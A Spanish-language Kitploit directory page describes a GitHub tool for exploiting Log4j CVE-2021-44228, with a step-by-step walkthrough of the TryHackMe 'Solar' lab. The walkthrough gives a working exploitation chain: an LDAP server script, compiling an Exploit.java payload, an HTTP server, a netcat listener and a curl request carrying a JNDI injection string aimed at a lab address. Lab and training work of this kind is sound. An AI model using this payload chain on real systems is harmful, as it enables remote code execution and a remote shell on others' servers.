Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/h3x0v3rl0rd/log4j
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubh3x0v3rl0rd/log4j

log4j

Explotación automatizada de Log4j CVE-2021-44228 con servidor LDAP y compilación de payloads, incluyendo un recorrido paso a paso para el desafío Solar de TryHackMe.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

💻 -h3x0v3rl0rd-

Explotando log4j CVE-2021-44228 ( TryHackMe Solar, Walkthrough)

root@kitploit:~
git clone https://github.com/n3rdh4x0r/log4j.git 

1. Ejecuta log4j.py (Esto instalará todas las aplicaciones necesarias e iniciará el servidor LDAP)

root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251

image

2. Añade la IP del atacante al archivo Exploit.java

2021-12-19_00-52

3. Compila el payload

root@kitploit:~
javac Exploit.java -source 8 -target 8

image

4. Servidor HTTP temporal

root@kitploit:~
python3 -m http.server 8888

image

5. Listener de netcat

root@kitploit:~
nc -lnvp 9999

image

6. ¡Finalmente, todo lo que queda por hacer es disparar el exploit y lanzar nuestra sintaxis JNDI! Ten en cuenta los cambios en el número de puerto (ahora referido a nuestro servidor LDAP) y el recurso que recuperamos, especificando nuestro exploit:

root@kitploit:~
curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

image

image

Descargar herramienta